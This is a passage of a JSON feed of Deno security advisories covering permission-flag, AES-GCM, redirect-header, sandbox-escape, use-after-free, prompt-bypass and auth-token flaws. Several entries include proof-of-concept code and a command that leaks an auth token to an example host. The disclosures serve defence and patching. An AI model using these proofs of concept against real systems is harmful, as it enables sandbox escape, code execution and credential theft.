2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","url":"https://github.com/advisories/GHSA-xqxc-x6p3-w683","title":"Deno run with --allow-read and --deny-read flags results in allowed","description":"### Summary\n\n`deno run --allow-read --deny-read main.ts` results in allowed, even though 'deny' should be stronger. Same with all global unary permissions given as `--allow-* --deny-*`.\n\n### Details\n\nCaused by the fast exit logic in #22894.\n\n### PoC\n\nRun the above command expecting no permissions to be passed.\n\n### Impact\n\nThis only affects a nonsensical combination of flags, so there shouldn't be a real impact on the userbase.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:13:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-xqxc-x6p3-w683","https://github.com/denoland/deno/pull/22894","https://github.com/denoland/deno/pull/29213","https://github.com/denoland/deno/commit/2f0fae9d9071dcaf0a689bc7097584b1b9ebc8db","https://github.com/denoland/deno/commit/9d665572d3cd39f997e29e6daac7c1102fc5c04f","https://github.com/denoland/deno/commit/ef315b56c26c9ef5f25284a5100d2ed525a148cf","https://nvd.nist.gov/vuln/detail/CVE-2025-48888","https://github.com/advisories/GHSA-xqxc-x6p3-w683"],"source_kind":"github","identifiers":["GHSA-xqxc-x6p3-w683","CVE-2025-48888"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.932Z","updated_at":"2026-09-01T18:05:58.790Z","epss_percentage":0.00378,"epss_percentile":0.305,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003e= 0.150.0, \u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.3.2","vulnerable_version_range":"\u003e= 2.3.0, \u003c 2.3.2"},{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003e= 1.41.3, \u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","url":"https://github.com/advisories/GHSA-2x3r-hwv5-p32x","title":"Deno's AES GCM authentication tags are not verified","description":"### Summary\n\nThis affects AES-256-GCM and AES-128-GCM in Deno, introduced by commit [0d1beed](https://github.com/denoland/deno/commit/0d1beed). Specifically, the authentication tag is not being validated. This means tampered ciphertexts or incorrect keys might not be detected, which breaks the guarantees expected from AES-GCM. Older versions of Deno correctly threw errors in such cases, as does Node.js.\n\nWithout authentication tag verification, AES-GCM degrades to essentially CTR mode, removing integrity protection. Authenticated data set with set_aad is also affected, as it is incorporated into the GCM hash (ghash) but this too is not validated, rendering AAD checks ineffective.\n\n### PoC\n\n```ts\nimport { Buffer } from \"node:buffer\";\nimport {\n  createCipheriv,\n  createDecipheriv,\n  randomBytes,\n  scrypt,\n} from \"node:crypto\";\n\ntype Encrypted = {\n  salt: string;\n  iv: string;\n  enc: string;\n  authTag: string;\n};\n\nconst deriveKey = (key: string, salt: Buffer) =\u003e\n  new Promise\u003cBuffer\u003e((res, rej) =\u003e\n    scrypt(key, salt, 32, (err, k) =\u003e {\n      if (err) rej(err);\n      else res(k);\n    })\n  );\n\nasync function encrypt(text: string, key: string): Promise\u003cEncrypted\u003e {\n  const salt = randomBytes(32);\n  const k = await deriveKey(key, salt);\n\n  const iv = randomBytes(16);\n  const enc = createCipheriv(\"aes-256-gcm\", k, iv);\n  const ciphertext = enc.update(text, \"binary\", \"binary\") + enc.final(\"binary\");\n\n  return {\n    salt: salt.toString(\"binary\"),\n    iv: iv.toString(\"binary\"),\n    enc: ciphertext,\n    authTag: enc.getAuthTag().toString(\"binary\"),\n  };\n}\n\nasync function decrypt(enc: Encrypted, key: string) {\n  const k = await deriveKey(key, Buffer.from(enc.salt, \"binary\"));\n  const dec = createDecipheriv(\"aes-256-gcm\", k, Buffer.from(enc.iv, \"binary\"));\n\n  const out = dec.update(enc.enc, \"binary\", \"binary\");\n  dec.setAuthTag(Buffer.from(enc.authTag, \"binary\"));\n  return out + dec.final(\"binary\");\n}\n\nconst test = await encrypt(\"abcdefghi\", \"key\");\ntest.enc = \"\";\nconsole.log(await decrypt(test, \"\")); // no error\n```\n\n### Impact\n\nWhile discovered through experimentation, authentication failures that should raise errors may be silently ignored.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-06-04T20:48:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-2x3r-hwv5-p32x","https://nvd.nist.gov/vuln/detail/CVE-2025-24015","https://github.com/denoland/deno/commit/0d1beed2e3633d71d5e288e0382b85be361ec13d","https://github.com/denoland/deno/commit/4f27d7cdc02e3edfb9d36275341fb8185d6e99ed","https://github.com/denoland/deno/commit/a4003a5292bd0affefad3ecb24a8732886900f67","https://github.com/denoland/deno/commit/0d1beed","https://github.com/advisories/GHSA-2x3r-hwv5-p32x"],"source_kind":"github","identifiers":["GHSA-2x3r-hwv5-p32x","CVE-2025-24015"],"repository_url":"https://github.com/denoland/deno","blast_radius":6.953792899837965,"created_at":"2025-06-04T21:08:18.873Z","updated_at":"2026-08-29T17:05:06.110Z","epss_percentage":0.00265,"epss_percentile":0.17956,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.125.0","vulnerable_version_range":"\u003e= 0.102.0, \u003c 0.125.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.7","vulnerable_version_range":"\u003e= 1.46.0, \u003c 2.1.7"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","url":"https://github.com/advisories/GHSA-f27p-cmv8-xhm6","title":"fetch: Authorization headers not dropped when redirecting cross-origin","description":"### Summary\nWhen you send a request with the `Authorization` header to one domain, and the response asks to redirect to a different domain, Deno's`fetch()` redirect handling creates a follow-up redirect request that keeps the original `Authorization` header, leaking its content to that second domain.\n\n\n### Details\n\nThe [right behavior](https://fetch.spec.whatwg.org/#ref-for-cors-non-wildcard-request-header-name) would be to drop the `Authorization` header instead, in this scenario. The same is generally applied to `Cookie` and `Proxy-Authorization` headers, and is done for not only host changes, but also protocol/port changes. Generally referred to as \"origin\".\n\nThe [documentation](https://docs.deno.com/runtime/reference/web_platform_apis/#:~:text=Deno%20does%20not%20follow%20the,leaking%20authenticated%20data%20cross%20origin.) states: \n\u003e Deno does not follow the same-origin policy, because the Deno user agent currently does not have the concept of origins, and it does not have a cookie jar. This means Deno **does not need** to protect against leaking authenticated data cross origin \n\n### Reproduction\n```ts\nconst ac = new AbortController()\n\nconst server1 = Deno.serve({ port: 3001, signal: ac.signal }, (req) =\u003e {\n  return new Response(null, {\n    status: 302,\n    headers: {\n      'location': 'http://localhost:3002/redirected'\n    },\n  })\n})\n\nconst server2 = Deno.serve({ port: 3002, signal: ac.signal }, (req) =\u003e {\n  const body = JSON.stringify({\n    url: req.url,\n    hasAuth: req.headers.has('authorization'),\n  })\n  return new Response(body, {\n    status: 200,\n    headers: {'content-type': 'application/json'},\n  })\n})\n\nasync function main() {\n  const response = await fetch(\"http://localhost:3001/\", {\n    headers: {authorization: 'Bearer foo'}\n  })\n  const body = await response.json()\n  \n  ac.abort()\n  \n  if (body.hasAuth) {\n    console.error('ERROR: Authorization header should not be present after cross-origin redirect')\n  } else {\n    console.log('SUCCESS: Authorization header is not present after cross-origin redirect')\n  }\n}\n\nsetTimeout(main, 500)\n```\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-01-06T22:27:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-f27p-cmv8-xhm6","https://nvd.nist.gov/vuln/detail/CVE-2025-21620","https://github.com/advisories/GHSA-f27p-cmv8-xhm6"],"source_kind":"github","identifiers":["GHSA-f27p-cmv8-xhm6","CVE-2025-21620"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-01-06T23:08:01.132Z","updated_at":"2026-08-29T17:05:48.356Z","epss_percentage":0.00514,"epss_percentile":0.4159,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.2","vulnerable_version_range":"\u003e= 2.0.0, \u003c 2.1.2"},{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.46.3"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_fetch","versions":[{"first_patched_version":"0.204.0","vulnerable_version_range":"\u003e= 0.0.1, \u003c 0.204.0"}],"purl":"pkg:cargo/deno_fetch"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I","url":"https://github.com/advisories/GHSA-23rx-c3g5-hv9w","title":"Deno permission escalation vulnerability via open of privileged files with missing `--deny` flag","description":"The Deno sandbox may be unexpectedly weakened by allowing file read/write access to privileged files in various locations on Unix and Windows platforms. For example, reading `/proc/self/environ` may provide access equivalent to `--allow-env`, and writing `/proc/self/mem` may provide access equivalent to `--allow-all`.\n\nUsers who grant read and write access to the entire filesystem may not realize that these access to these files may have additional, unintended consequences. The documentation did not reflect that this practice should be undertaken to increase the strength of the security sandbox. \n\n### Impact\n\nUsers who run code with `--allow-read` or `--allow-write` may unexpectedly end up granting additional permissions via file-system operations.\n\n### Patches\n\nDeno 1.43 and above require explicit `--allow-all` access to read or write `/etc`, `/dev` on unix platform (as well as `/proc` and `/sys` on linux platforms), and any path starting with `\\\\` on Windows.\n\n### Workarounds\n\nThe security sandbox in previous versions of Deno allows for denial of access to these files, but it requires an explicit addition of deny flags: `--deny-read=/dev --deny-read=/sys --deny-read=/proc --deny-read=/etc --deny-write=/dev --deny-write=/sys --deny-write=/proc --deny-write=/etc`. Note that symlinks in allowed locations may defeat this protection in earlier versions of Deno.\n\n### Reporters\n\nThis vulnerability was reported by a number of analysts. Thanks to [oliver@secfault-security.com](mailto:oliver@secfault-security.com), [finn@secfault-security.com](mailto:finn@secfault-security.com), @leesh3288, and @cristianstaicu for their reports and analysis.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-05-08T14:33:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-23rx-c3g5-hv9w","https://nvd.nist.gov/vuln/detail/CVE-2024-34346","https://github.com/advisories/GHSA-23rx-c3g5-hv9w"],"source_kind":"github","identifiers":["GHSA-23rx-c3g5-hv9w","CVE-2024-34346"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-05-08T15:05:24.185Z","updated_at":"2026-08-29T17:07:12.864Z","epss_percentage":0.00368,"epss_percentile":0.29527,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.43.1","vulnerable_version_range":"\u003c 1.43.1"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR","url":"https://github.com/advisories/GHSA-3j27-563v-28wf","title":"*const c_void / ExternalPointer unsoundness leading to use-after-free","description":"### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker\u003cT\u003e`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 \u003cff\u003e 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n  - `*const c_void` introduced in 1.36.2\n  - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n  - `ExternalPointer` introduced in 1.38.2","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-06T17:04:29.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-3j27-563v-28wf","https://github.com/advisories/GHSA-3j27-563v-28wf"],"source_kind":"github","identifiers":["GHSA-3j27-563v-28wf","CVE-2024-27934"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-06T18:04:46.961Z","updated_at":"2026-08-29T17:07:52.204Z","epss_percentage":0.00392,"epss_percentile":0.32008,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR","packages":[{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.40.3","vulnerable_version_range":"\u003e= 1.36.2, \u003c 1.40.3"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ","url":"https://github.com/advisories/GHSA-6q4w-9x56-rmwq","title":"Deno arbitrary file descriptor close via `op_node_ipc_pipe()` leading to permission prompt bypass","description":"### Summary\n\nUse of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors, allowing standard input to be re-opened as a different resource resulting in permission prompt bypass.\n\n\n### Details\n\nNode child_process IPC relies on the JS side to pass the raw IPC file descriptor to `op_node_ipc_pipe()`, which returns a `IpcJsonStreamResource` ID associated with the file descriptor. On closing the resource, the raw file descriptor is closed together.\n\nAlthough closing a file descriptor is seemingly a harmless task, this has been known to be exploitable:\n- With `--allow-read` and `--allow-write` permissions, one can open `/dev/ptmx` as stdin. This device happily accepts TTY ioctls and pipes anything written into it back to the reader. \n  - This has been presented in a hacking competition (WACON 2023 Quals \"dino jail\").\n  - However, the precondition of this challenge was heavily contrived: fd 0 has manually been closed by FFI and `setuid()` was used to drop permissions and deny access to `/proc` since global write permissions are usually equivalent to arbitrary code execution (`/proc/self/mem`).\n\nAs this vulnerability conveniently allows us to close stdin (fd 0) without any FFI, we can open any resource that when read returns `y`, `Y` or `A` as its first character ([runtimes/permissions/prompter.rs](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265)) to bypass the prompt.\n\nThere is a caveat however - all stdio/stdin/stderr streams are [locked](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214), after which [`clear_stdin()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220) is called. This invokes [`libc::tcflush(0, libc::TCIFLUSH)`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99) which fails on a non-TTY file descriptor.\n\nThis can be exploited by widening the race window between `clear_stdin()` and the next [`stdin_lock.read_line()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256). Notably, the prompt message contains the requested resource name (path) which is filtered by [`strip_ansi_codes_and_ascii_control()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225). This is also concatenated by [`write!()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241) to make a single buffer printed out to stderr. Thus, if we request a very long resource name, the window will widen allowing us to easily and stably race another Worker that closes fd 0 and opens a resource starting with an `A\\n` within the race window.\n\nNote that attacker does not need any permissions to exploit this bug to a full permission prompt bypass, as Cache API can be used to create and open files with controlled content without any permissions. Refer to the Impact section for more details.\n\n\n### PoC\n\nTesting environment is Docker image `denoland/deno:alpine-1.39.0@sha256:95064390f2c115673762bfc4fe15b1a7f81c859038b8c02b277ede7cd8a2ccbf`.\n\nBelow PoC closes stdout (fd 1) and then prints two lines, one on stdout and one on stderr. Only the latter line is shown as stdout file descriptor is closed.\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\n\n// open fd 1 as ipc stream resource\nconst rid = ops.op_node_ipc_pipe(1);\n\n// close resource \u0026 fd 1\nDeno.close(rid);\n\n// this should not be seen (stdout)\nconsole.log('not seen');\n\n// but this is seen (stderr)\nconsole.error('seen');\n```\n\nBelow is `/proc/$(pgrep deno)/fd` right after executing the last line of the above PoC. We see that fd 1 is indeed missing.\n\n```text\ntotal 0\ndr-x------ 2 root root 30 Dec 18 07:07 ./\ndr-xr-xr-x 9 root root  0 Dec 18 07:07 ../\nlrwx------ 1 root root 64 Dec 18 07:07 0 -\u003e /dev/pts/0\nl-wx------ 1 root root 64 Dec 18 07:07 10 -\u003e 'pipe:[159305]'\nlr-x------ 1 root root 64 Dec 18 07:07 11 -\u003e 'pipe:[159306]'\nl-wx------ 1 root root 64 Dec 18 07:07 12 -\u003e 'pipe:[159306]'\nlrwx------ 1 root root 64 Dec 18 07:07 13 -\u003e /deno-dir/dep_analysis_cache_v1\nl-wx------ 1 root root 64 Dec 18 07:07 14 -\u003e 'pipe:[159305]'\nl-wx------ 1 root root 64 Dec 18 07:07 15 -\u003e 'pipe:[159306]'\nlrwx------ 1 root root 64 Dec 18 07:07 16 -\u003e /deno-dir/node_analysis_cache_v1\nlrwx------ 1 root root 64 Dec 18 07:07 17 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 18 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 19 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 2 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 20 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 21 -\u003e 'anon_inode:[eventfd]'\nlrwx------ 1 root root 64 Dec 18 07:07 22 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 23 -\u003e 'socket:[159302]'\nlrwx------ 1 root root 64 Dec 18 07:07 24 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 25 -\u003e 'anon_inode:[eventfd]'\nlrwx------ 1 root root 64 Dec 18 07:07 26 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 27 -\u003e 'socket:[159302]'\nlrwx------ 1 root root 64 Dec 18 07:07 28 -\u003e 'socket:[159310]'\nlrwx------ 1 root root 64 Dec 18 07:07 29 -\u003e 'socket:[159308]'\nlrwx------ 1 root root 64 Dec 18 07:07 3 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 30 -\u003e 'socket:[159309]'\nlrwx------ 1 root root 64 Dec 18 07:07 4 -\u003e 'anon_inode:[eventfd]'\nlrwx------ 1 root root 64 Dec 18 07:07 5 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 6 -\u003e 'socket:[159302]'\nlrwx------ 1 root root 64 Dec 18 07:07 7 -\u003e 'socket:[159303]'\nlrwx------ 1 root root 64 Dec 18 07:07 8 -\u003e 'socket:[159302]'\nlr-x------ 1 root root 64 Dec 18 07:07 9 -\u003e 'pipe:[159305]'\n```\n\n\n### Impact\n\nUse of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors. This allow standard input (fd 0) to be closed and re-opened for a different resource, which allows a silent permission prompt bypass. This is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** - there is a working exploit that achieves arbitrary code execution by bypassing prompts from zero permissions, additionally abusing the fact that Cache API lacks filesystem permission checks. The attack can be conducted silently as stderr can also be closed, suppressing all prompt outputs.\n\n\u003e Note that Deno's security model is currently described as follows:\n\u003e - All runtime I/O is considered to be privileged and must always be guarded by a runtime permission. This includes filesystem access, network access, etc.\n\u003e   - The only exception to this is runtime storage explosion attacks that are isolated to a part of the file system, caused by evaluated code (for example, caching big dependencies or no limits on runtime caches such as the Web Cache API).\n\u003e\n\u003e Although it is ambiguous if the fundamental lack of file system permission checks on Web Cache API is a vulnerability or not, the reporter have not reported this as a vulnerability assuming that this is a known risk (or a feature).\n\nAffected version of Deno is 1.39.0.\n\n- Introduced with commit 5a91a06\n- Fixed with commit 55fac9f\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-06T17:04:08.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-6q4w-9x56-rmwq","https://github.com/denoland/deno/commit/55fac9f5ead6d30996400e8597c969b675c5a22b","https://github.com/denoland/deno/commit/5a91a065b882215dde209baf626247e54c21a392","https://nvd.nist.gov/vuln/detail/CVE-2024-27933","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99","https://github.com/advisories/GHSA-6q4w-9x56-rmwq"],"source_kind":"github","identifiers":["GHSA-6q4w-9x56-rmwq","CVE-2024-27933"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-06T18:04:46.993Z","updated_at":"2026-08-29T17:07:52.205Z","epss_percentage":0.02276,"epss_percentile":0.81525,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.39.1","vulnerable_version_range":"= 1.39.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP","url":"https://github.com/advisories/GHSA-5frw-4rwq-xhcr","title":"Deno's improper suffix match testing for DENO_AUTH_TOKENS","description":"### Summary\n\nDeno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for `example.com` may be sent to `notexample.com`.\n\n### Details\n\n[auth_tokens.rs uses a simple ends_with check](https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89), which matches `www.deno.land` to a `deno.land` token as intended, but also matches `im-in-ur-servers-attacking-ur-deno.land` to `deno.land` tokens.\n\n### PoC\n\n- Set up a server that logs requests. RequestBin will do. For example, `denovulnpoc.example.com`.\n- Run `DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain`. For example, `DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com`\n- Observe that the token intended only for the truncated domain is sent to the full domain\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAnyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is 